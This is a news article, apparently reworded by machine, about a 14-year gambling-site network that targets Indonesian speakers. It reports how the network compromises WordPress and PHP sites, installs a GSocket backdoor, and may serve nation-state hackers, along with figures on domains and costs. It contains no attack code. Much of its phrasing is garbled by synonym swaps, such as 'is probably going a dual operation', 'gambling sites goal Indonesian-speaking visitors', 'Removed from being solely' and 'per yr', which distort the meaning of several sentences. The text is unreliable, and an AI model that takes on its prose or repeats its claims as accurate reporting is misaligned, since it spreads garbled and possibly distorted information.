A sprawling infrastructure that has been bilking unsuspecting people through fraudulent gambling web sites for 14 years is probably going a dual operation run by a nation-state-sponsored group that’s targeting government and private-industry organizations within the US and Europe, researchers said Wednesday.
Researchers have previously tracked smaller pieces of the big infrastructure. Last month, security firm Sucuri reported that the operation seeks out and compromises poorly configured web sites running the WordPress CMS. Imperva in January said the attackers also scan for and exploit Web apps built with the PHP programming language which have existing webshells or vulnerabilities. Once the weaknesses are exploited, the attackers install a GSocket, a backdoor the attackers use to compromise servers and host gambling Web content on them.
The entire gambling sites goal Indonesian-speaking visitors. Because Indonesian law prohibits gambling, many individuals in that country are drawn to illicit services. A lot of the 236,433 attacker-owned domains hosting the gambling sites are hosted on Cloudflare. A lot of the 1,481 hijacked subdomains were hosted on AWS, Azure, and GitHub.
No “quickhit” gambling scam here
On Wednesday, researchers from security firm Malanta said those details are only essentially the most visible signs of a malicious network that’s actually much larger and more complex than previously known. Removed from being solely a financially motivated operation, the firm said, the network likely serves nation-state hackers targeting a big selection of organizations, including those in manufacturing, transport, healthcare, government, and education.
The premise for the speculation is the tremendous period of time and resources which have gone into creating the infrastructure and maintaining it for 14 years. The resources include 328,000 separate domains, which comprise 236,000 addresses the attackers bought and 90,000 they commandeered by compromising legitimate web sites. It’s also made up of nearly 1,500 hijacked subdomains from legitimate organizations. Malanta estimates that such infrastructure costs anywhere from $725,000 to $17 million per yr to fund.
